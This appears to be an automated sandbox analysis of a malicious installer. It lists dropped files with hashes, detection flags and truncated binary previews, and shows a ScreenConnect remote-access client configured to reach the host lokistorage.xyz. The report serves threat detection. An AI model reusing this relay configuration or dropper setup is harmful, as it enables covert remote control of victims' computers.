                                                                Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..*B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..*D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):197120
                                                                Entropy (8bit):6.595800276062395
                                                                Encrypted:false
                                                                SSDEEP:3072:TS77Zz8NtrNOuJTaFs2VUXEWcyzvXqu5zDvJXYt:E7OrJOuJE4Xawqu5G
                                                                MD5:F311A8217807F6C85817058522E234A2
                                                                SHA1:CEB586B3CF7B0EE86EA8242D9B3D8641C9444CD1
                                                                SHA-256:032450CD037D9E0EEC49E0B4FF44073D539775633FB4AF6FD76D4CB19116AAC9
                                                                SHA-512:5EF1F6B595AF9CC7F788680AC3F3E9B8B12BAAFE734A8E2F675BAA57F5EF2C69806492911BDA54F11C5A4B8CF3CCED82CFC6E0ECF214E45083E9F9AA6A83D039
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Joe Sandbox View:
                                                                • Filename: Latest version 4.7.exe, Detection: malicious, Browse
                                                                • Filename: Latest version 4.7.exe, Detection: malicious, Browse
                                                                • Filename: INSPECAO-B01S.msi, Detection: malicious, Browse
                                                                • Filename: 1.exe, Detection: malicious, Browse
                                                                • Filename: 1.exe, Detection: malicious, Browse
                                                                • Filename: 5iT2ITz44g.exe, Detection: malicious, Browse
                                                                • Filename: 5iT2ITz44g.exe, Detection: malicious, Browse
                                                                • Filename: E-receipt-67.exe, Detection: malicious, Browse
                                                                • Filename: E-receipt-67.exe, Detection: malicious, Browse
                                                                • Filename: statment.exe, Detection: malicious, Browse
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....k%..........." ..0.............*.... ... ....... .......................`.......L....@.....................................O.... ..|....................@......4...8............................................ ............... ..H............text...P.... ...................... ..`.rsrc...|.... ......................@..@.reloc.......@......................@..B........................H.......................^................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*..{....*:.(......}....*.0..A........(....s....%.~'...%-.&~&.....y...s....%.'...(...+(...+o"...o....*....0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.%...($....5..............s%....=...*..0...........~)...%-.&~(.....|...s&...%.)...(...+..~*...%-.&~(.....}...s(...%.*...(...+.r9..
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):68096
                                                                Entropy (8bit):6.081952570081618
                                                                Encrypted:false
                                                                SSDEEP:1536:XxgIAw8rVbpcgOswatz8Bn2yRIZMmQ9VIlxnBVb8ER:Xw31b4f0Q9VAnNR
                                                                MD5:3FF07C657068430EF677181D1F67066D
                                                                SHA1:37F7E9D2CCB65B4EA2733393015635EA1B43393E
                                                                SHA-256:D17CF13612039F6A4CA17B56C32399CCBE279A499C8D2F8E910B1FD6F4FFF2B1
                                                                SHA-512:5552208B5649CEAC2B32510EA12D409A85643D27E6A9C335E049195A507AE9211AEE77574376FDE059747998B60AE041E191635A67C3461585ABA7F9B877B095
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...C............." ..0..............!... ...@....... ....................................@.................................-!..O....@.......................`....... ..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................a!......H.......Po....................... ........................................(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*.~,...%-.&~+.....j...s....%.,...(...+*vs....%.}Q.........s....(....*....0...........s....}.....s....}...........}.......('.....}.....(....&.(*..........s....o.....(*...~-...%-.&~+.....k...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s>...}....... ..6........s....s>...}.....((...($............o%........
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):95520
                                                                Entropy (8bit):6.505417048098125
                                                                Encrypted:false
                                                                SSDEEP:1536:jg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgIU0HMm7/xK:MhbNDxZGXfdHrX7rAc6myJkgIU0HVY
                                                                MD5:826314610D9E854477B08666330940B5
                                                                SHA1:65B601D60042CF6F263CD38AC2F63CD06A9DE159
                                                                SHA-256:E54963CB63C9E471E2D3D59E55E4C7AEEDCCAFDD616B99C4B3AF230608E4BCC9
                                                                SHA-512:5C01D6DE25D60EB6B1EB72B7FA6401B71153C2A740C41AEEB2BD302CC4E80F5C1A388B647EE16DA196705AC8EDBC60ABDA49B9A531517BB85959CC018FB5D1FB
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.................................-.....@.................................p...x....`..P............L.. )...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...P....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):546304
                                                                Entropy (8bit):6.03286879586464
                                                                Encrypted:false
                                                                SSDEEP:6144:hAUz5UEsIXxk3QCLKSkGEexE77VcYbUinCLrDfElYzMsdqe1J6tMznSAiOUfw8qg:hK67tEshnkDfyt9MznZd8PTIP8
                                                                MD5:3B1BA4BEBEFDC8A95B0F2F0B4E50C527
                                                                SHA1:15551D2E8BFB829F3A96D161B43DE820C0D417CE
                                                                SHA-256:A843B3A4549C43EF5BD8470CACF5D2F0F3B3C8110441FCC10079FACC7DB3DE29
                                                                SHA-512:F41595586CD5330537F5F02B392310B028E36F618E2583D125430ECD103EBBF6D2CF6BEFCFB1B32279EEB9FD7EF018F49131E3906FB61BC324DA85D93A9A18C7
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..N...........i... ........... ....................................@..................................h..O.......t...........................<h..8............................................ ............... ..H............text...@M... ...N.................. ..`.rsrc...t............P..............@..@.reloc...............T..............@..B.................i......H........@...&...................g........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):1721344
                                                                Entropy (8bit):6.638160977312247
                                                                Encrypted:false
                                                                SSDEEP:24576:jQNtbLFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPTs5:jebLJkGYYpT0+TFiH7efP
                                                                MD5:D196174CF03F86C8776E717F07D5D19F
                                                                SHA1:BBD2C6A59229B3E4EC7C5742248F3F55A61DD216
                                                                SHA-256:A1EDD67A131505CC84D76601474C53874A56B5437B835838E4A866E20F6CD264
                                                                SHA-512:CF4D159BCB42A1A7EA03F8877736CACE109AE79998906B9178C74F7A9B63030CDDC2BC94EF6C5F718E99C2D0039CF3589F8C4F2BF5B67DB94B3B96D2C988B45B
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....A............" ..0..<..........Z[... ...`....... ....................................@..................................[..O....`..|...........................dZ..8............................................ ............... ..H............text...h;... ...<.................. ..`.rsrc...|....`.......>..............@..@.reloc...............B..............@..B................;[......H.......,...................0....Y........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):260168
                                                                Entropy (8bit):6.416438906122177
                                                                Encrypted:false
                                                                SSDEEP:3072:qJvChyA4m2zNGvxDd6Q6dtaVNVrlaHpFahvJ9ERnWtMG8Ff2lt9Bgcld5aaYxg:0IvxDdL6d8VNdlC3g0RCXh5D
                                                                MD5:5ADCB5AE1A1690BE69FD22BDF3C2DB60
                                                                SHA1:09A802B06A4387B0F13BF2CDA84F53CA5BDC3785
                                                                SHA-256:A5B8F0070201E4F26260AF6A25941EA38BD7042AEFD48CD68B9ACF951FA99EE5
                                                                SHA-512:812BE742F26D0C42FDDE20AB4A02F1B47389F8D1ACAA6A5BB3409BA27C64BE444AC06D4129981B48FA02D4C06B526CB5006219541B0786F8F37CF2A183A18A73
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A........................T....................V.......V.......V......................=U......=U......=U$.....=U......Rich....................PE..d.....Qf.........." ...'.^...^.......................................................(....`..........................................e.......f..P................ ......HP..........P%..p............................$..@............p...............................text...t].......^.................. ..`.rdata.......p.......b..............@..@.data....+...........d..............@....pdata... ......."...x..............@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):61216
                                                                Entropy (8bit):6.316664164724877
                                                                Encrypted:false
                                                                SSDEEP:1536:9Ai+zmNzdj8bv8DtYQ4RE+TC34/ibdt7Xx56:9UzmNDYQbEQta
                                                                MD5:C1F206B0C0058DC4CC7B9F3125F61E20
                                                                SHA1:541A1564799DA24C48BE188888F306381EF23728
                                                                SHA-256:94E711FD79FC81084FB222FF927893669DDBA9890C6622DD4981FB5766438A63
                                                                SHA-512:6163A255DAF2DC9EC14391F31CA09A466B7B33662F2215B9941ADD59B46CD1177E9240D2B1C42E41EA0AC9AE2EFA03F6A2D3E80497D32F6E505B813ED66DA2AD
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c.8..........."...0.............*.... ........@.. ....................... ............@.....................................O....... ............... )..............8............................................ ............... ..H............text...0.... ...................... ..`.rsrc... ...........................@..@.reloc..............................@..B........................H........S...............................................................(....*^.(.......a...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........(....(....(....(....r...p(....o....(....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s ...(!...s....("...*..0...........(#.....($.....(%....s....%.o&...%.o'...%.o(...%s!...o)...%~....o*...}......(....o+...o,....(-.....@...%..(.....o.....s/...}.....{...........s0...o1....s...
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):266
                                                                Entropy (8bit):4.842791478883622
                                                                Encrypted:false
                                                                SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                Malicious:false
                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):598816
                                                                Entropy (8bit):6.182826342545805
                                                                Encrypted:false
                                                                SSDEEP:6144:0ya9pDzjhf+YMojz3cZRzyyUs0Ny2rOfQyEAlVw72191BVi1NnfEQcYF2/R4IrNC:jajDzNZFjLcZRzyyh5/EA3wv1lSYGXk
                                                                MD5:AB5FA8D90645878D587F386D0E276C02
                                                                SHA1:A602A20735A1104851F293965F1FE4AB678BF627
                                                                SHA-256:316BBF433F1F803D113ADF060C528CCC636656CEE26B90F5FEA011C1C73C7D16
                                                                SHA-512:A181E23C8FA01BC1D9F0F9F95A5CA6112E2B61F34F4C1DA696D3CCABBBD942BCC81A3F4A60921328A6020D28AED8711C22BE33761CB685921D50FEA8B1D7B986
                                                                Malicious:true
                                                                Yara Hits:
                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....]..........."...0.............".... ... ....@.. .......................`......0.....@.....................................O.... .................. )...@......$...8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......LC..X.............................................................{D...*..{E...*V.(F.....}D.....}E...*...0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...*.*.*. }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X*...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N...*..{O...*..{P...*V.(F.....}O.....}P...*.0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...*.*.*. 1.c. )UU.
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):266
                                                                Entropy (8bit):4.842791478883622
                                                                Encrypted:false
                                                                SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                Malicious:true
                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):842248
                                                                Entropy (8bit):6.268561504485627
                                                                Encrypted:false
                                                                SSDEEP:12288:q9vy8YABMuiAoPyEIrJs7jBjaau+EAaMVtw:P8Y4MuiAoPyZrJ8jrvDVtw
                                                                MD5:BE74AB7A848A2450A06DE33D3026F59E
                                                                SHA1:21568DCB44DF019F9FAF049D6676A829323C601E
                                                                SHA-256:7A80E8F654B9DDB15DDA59AC404D83DBAF4F6EAFAFA7ECBEFC55506279DE553D
                                                                SHA-512:2643D649A642220CEEE121038FE24EA0B86305ED8232A7E5440DFFC78270E2BDA578A619A76C5BB5A5A6FE3D9093E29817C5DF6C5DD7A8FBC2832F87AA21F0CC
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}....}H..}H..}H.d~I..}H.dxIG.}H.dyI..}H..xI..}H..yI..}H..~I..}H..|H8.}H..}H..}H2.}I..}H2..I..}HRich..}H........PE..d.....Gf.........." ...'.P...........H....................................... ......q.....`......................................... ...t....................P...y.......(......,4.....T.......................(.......@............`...............................text....O.......P.................. ..`.rdata...z...`...|...T..............@..@.data....d.......0..................@....pdata...y...P...z..................@..@_RDATA...............z..............@..@.reloc..,4.......6...|..............@..B................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):81696
                                                                Entropy (8bit):5.861320173003981
                                                                Encrypted:false
                                                                SSDEEP:1536:QtyCl44uzbexI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7AB7gxv:78BxukLdEBY
                                                                MD5:2C158A30F7274E1931860E434DE808A2
                                                                SHA1:F649A56C9A598117D68CC6999627A937305DB6C7
                                                                SHA-256:B623E67BEA356C1793F3C921C5838719ED8B879EFCD966E97EE753498B1618B5
                                                                SHA-512:14BD481BF183CACAE210EB06AFF04870C6D53D3E7F095EA7F96A7EA227167E6A38EB20C9EDE9F36BF23D02C36182A463239B3A835D0BD28E8666C378F76FE64D
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....)............"...0..@...........^... ...`....@.. .......................`...... .....@..................................^..O....`.................. )...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc........`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....*^.(.......;...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(*........(+...o,...(-...t....
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):266
                                                                Entropy (8bit):4.842791478883622
                                                                Encrypted:false
                                                                SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                Malicious:false
                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):2268
                                                                Entropy (8bit):4.7228220006400745
                                                                Encrypted:false
                                                                SSDEEP:48:35iMs86h/dHH/dHS/dHmh/dHfh/dH8h/dHjdH6dH85AfdH55AfdHKdH/dHAdHYOk:0OeHVHeHyHzHAHZHUH82H52HkH1HyHDC
                                                                MD5:095C85ACC658F0733BC6941163EC234C
                                                                SHA1:298C53608E02CAC620702CB6ABE75C70560C03B1
                                                                SHA-256:8E3DC9D06B282A536E1AF7806D7F434D5738D4932DAE557CCD762BFEED0BFC11
                                                                SHA-512:FE3FBE2BCD2BAABCF192663DD7603CCE1DB1025A9D40AD98598D5441D892EFC0C94AA41FE61256762538E0ED3BCC3E7958CDBF87C2D577EE3BDD561597635D03
                                                                Malicious:false
                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.SystemSettings" type="System.Configuration.ClientSettingsSection" />.. <section name="ScreenConnect.UserInterfaceSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.SystemSettings />.. <ScreenConnect.UserInterfaceSettings>.. <setting name="ShowBalloonOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowBalloonOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowBalloonOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="HideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessHideWallpaperOnConne
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:XML 1.0 document, ASCII text, with very long lines (447), with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):937
                                                                Entropy (8bit):5.785690574308825
                                                                Encrypted:false
                                                                SSDEEP:24:2dL9hK6E4dl/SKGumeV858KnTqKoIgmCeKMG3vH:chh7HHSomeV8LnuKoHmCeKT3v
                                                                MD5:5E233AF4F36C85FA9CA6A643F8CEA130
                                                                SHA1:9F64A3CFB01BBFE02C4511F0AF9856FA2DA89452
                                                                SHA-256:317F6ACC9CF9A2DAD21874D0F439C6B6DE3C14BA875FAA525B24CA5DBC74C91D
                                                                SHA-512:4CD32CD0243BEA0CA3C45544D65F4DBA0DBEDB79E09C4A8211AF0568E2F6C7EFE77B5D2C7EA21C7EB94FF1863D426EBA850055819F294DF1C1D0C4D311C036D7
                                                                Malicious:false
                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ClientLaunchParametersConstraint" serializeAs="String">.. <value>?h=lokistorage.xyz&amp;p=8041&amp;k=BgIAAACkAABSU0ExAAgAAAEAAQChADX0VDCOYpzw3rHL2%2fWsmDfp2rMCOwlBz1eCGgD2Oi1gRuiacwZcRKSZxBYWgdfGxDbYoeGqdwtpMoqlG8JOF4ZKxVYt9zhvvQIB5ire7%2fRFo81g3%2b6hxkPJc0INqs%2bXruwq1z%2b6smxQSCBb%2fykHDHW7AhbHyK65sNB5aK02%2bPswsU904ncQII1vFx60s4CJ8ilr9kIfJWyMgG0RDnaKSCV6gAU5oDSV8wZ3CFUrC2FZNJ8A0Fkfb5xYiK39FBIivzP4vYfAruNnluqWCCrM3hrKooHc9G96dlUI6y4avh5vYzfNXEaIxQvrLqzjTpAdRhiVwzF5SgOywQIOk%2bC5</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                Process:C:\Users\user\Desktop\H36NgltNe7.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):321
                                                                Entropy (8bit):5.36509199858051
                                                                Encrypted:false
                                                                SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTrM3RJoDLIP12MUAvvR+uCv:Q3La/KDLI4MWuPTArkvoDLI4MWuCv
                                                                MD5:1CF2352B684EF57925D98E766BA897F2
                                                                SHA1:6E8CB2C1143E9D9D1211BAA811FE4CAA49C08B55
                                                                SHA-256:43C3FB3C0B72A899C5442DAC8748D019D800E0A9421D3677EB96E196ED285290
                                                                SHA-512:9F2D6F89453C867386A65A04FF96067FC3B23A99A4BCE0ECD227E130F409069FE6DD202D4839CBF204C3F204EC058D6CDFDADA7DD212BC2356D74FEC97F22061
                                                                Malicious:true
                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):746
                                                                Entropy (8bit):5.349174276064173
                                                                Encrypted:false
                                                                SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhaOK9eDLI4MNJK9P/JNTK9yirkvoDLb:ML9E4KlKDE4KhKiKhPKIE4oKNzKogE4P
                                                                MD5:ED994980CB1AABB953B2C8ECDC745E1F
                                                                SHA1:9E9D3E00A69FC862F4D3C30F42BF26693A2D2A21
                                                                SHA-256:D23B54CCF9F6327FE1158762D4E5846649699A7B78418D056A197835ED1EBE79
                                                                SHA-512:61DFC93154BCD734B9836A6DECF93674499FF533E2B9A1188886E2CBD04DF35538368485AA7E775B641ADC120BAE1AC2551B28647951C592AA77F6747F0E9187
                                                                Malicious:false
                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                Process:C:\Windows\SysWOW64\msiexec.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                Category:dropped
                                                                Size (bytes):1110630
                                                                Entropy (8bit):7.800118817272725
                                                                Encrypted:false
                                                                SSDEEP:24576:QUUGGVA5kuQ7Ye80NncfI59+5lwXoTl2cx:jGVyk7cer5IIvXobx
                                                                MD5:845B0569D54305E62C6E8FFE198D217C
                                                                SHA1:CD06C3D1554FE08099ADA4F4448A23A6422E6234
                                                                SHA-256:4DA6C507C746CD07CA4546E723D0D145BBF4D26FF8DE13F1A0750EF323A89A2E
                                                                SHA-512:AF45BB8199F2AF323B9954DA0D11EED51459708608D356BC40BD9D9189C02C2C902F533077724DD7C6A7068E564B5C8F621EF1032098CEF26ED26D5BF26E23FE
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
